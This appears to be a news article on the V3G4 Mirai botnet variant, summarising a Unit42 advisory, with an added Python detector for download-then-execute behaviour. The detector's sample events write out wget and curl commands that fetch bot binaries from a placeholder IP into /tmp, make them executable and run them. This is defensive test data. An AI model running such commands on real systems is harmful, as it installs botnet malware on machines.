A new Mirai botnet variant, known as V3G4, is being used by attackers to target Internet of Things devices and Linux-based servers.

A New Mirai Botnet Is Used in Various Attacks

On February 15, 2023, Unit42 security researchers at Palo Alto Networks published an advisory about a new Mirai botnet variant, dubbed "V3G4". The Unit42 post warned readers that various campaigns, tracked between July and December 2022, have used the botnet malware to carry out exploits.

Overall, the malicious operator managed to exploit 13 security vulnerabilities, all of which could allow remote code execution to create a botnet. Unit42 wrote in its advisory that, upon remote code execution, "the wget and curl utilities are automatically executed to download Mirai client samples from malware infrastructure and then execute the downloaded bot clients."
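The download-then-execute behavior quoted above can be hunted for in process-execution telemetry. The following is an added example, not code from the Unit42 advisory: it correlates a wget or curl download with execution of the same file shortly afterwards. The event format, the 60-second window, and every host, path and file name are assumptions constructed for illustration.

```python
import shlex
from posixpath import basename, join, normpath
from urllib.parse import urlparse

# Constructed process-execution events: (epoch seconds, working dir, command line).
# Hosts, paths and file names are placeholders, not indicators from the advisory.
SAMPLE_EVENTS = [
    (1000, "/tmp", "wget http://198.51.100.7/bot.arm7 -O /tmp/.x"),
    (1002, "/tmp", "chmod 777 /tmp/.x"),
    (1003, "/tmp", "/tmp/.x init"),
    (2000, "/var/tmp", "curl -O http://198.51.100.7/bot.mips"),
    (2004, "/var/tmp", "./bot.mips"),
    (3000, "/root", "curl -o /root/report.json https://example.com/api/report"),
    (3500, "/root", "cat /root/report.json"),
    (4000, "/tmp", "wget http://example.com/tool -O /tmp/tool"),
    (9000, "/tmp", "/tmp/tool"),  # executed long after the download: not correlated
]

def download_target(argv, cwd):
    """Return the absolute path a wget/curl command writes to, or None."""
    tool = basename(argv[0])
    if tool not in ("wget", "curl"):
        return None
    urls = [a for a in argv[1:] if "://" in a]
    out_flag = "-O" if tool == "wget" else "-o"   # flag that takes a file name
    out = None
    if out_flag in argv[1:-1]:
        out = argv[argv.index(out_flag) + 1]
    elif urls and (tool == "wget" or "-O" in argv):  # name taken from the URL
        out = basename(urlparse(urls[-1]).path) or ("index.html" if tool == "wget" else None)
    if not out or out == "-":                        # "-" means stdout
        return None
    return normpath(join(cwd, out))

def find_download_then_execute(events, window=60):
    """Flag files fetched by wget/curl and executed within `window` seconds."""
    pending, hits = {}, []
    for ts, cwd, cmdline in sorted(events):
        argv = shlex.split(cmdline)
        if not argv:
            continue
        target = download_target(argv, cwd)
        if target:
            pending[target] = ts
            continue
        exe = normpath(join(cwd, argv[0]))
        if exe in pending and ts - pending[exe] <= window:
            hits.append((exe, pending[exe], ts))
    return hits
```

On the constructed events, only the two files that are fetched and then run within the window are flagged; the downloaded JSON report and the late-executed tool are not.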

Unit42 also informed readers that the same threat actor is suspected to be behind each attack. What's more, the threat actor used a racial slur in the attack, which was censored in the advisory. At the time of writing, no malicious service has been linked to the string of attacks.

Linux Servers and IoT Devices Have Been Targeted


This new Mirai variant has been used to exploit IoT devices and Linux-based servers. In the aforementioned advisory, Unit42 wrote that V3G4 "targets exposed servers and networking devices running Linux", while also taking aim at IoT devices, to "conduct further attacks, such as distributed denial-of-service (DDoS) attacks."

Unit42 also wrote that "once the client establishes a connection with the C2 server, the threat actor can issue commands to the client to launch DDoS attacks." Botnets are commonly used in DDoS attacks to disrupt a server or website's typical stream of online traffic. This can cause the server or site to crash, making it temporarily inaccessible to regular users.

Mirai Malware Has Been a Threat for Years

Since the first Mirai program emerged in 2016, Mirai botnet variants have been used numerous times to launch malicious attacks.

Many well-known platforms have been targeted using Mirai botnets, including Minecraft, Amazon, Netflix, and PayPal. There's no doubt that this family of malware poses a huge risk to online services.

Botnets Are Dangerous Yet Effective Attack Vectors

Creating a network of zombie devices to carry out malicious exploits is a sophisticated yet highly concerning method used by cybercriminals today, especially in DDoS attacks. We'll certainly see more kinds of botnet malware emerge in the future, possibly from Mirai's creators.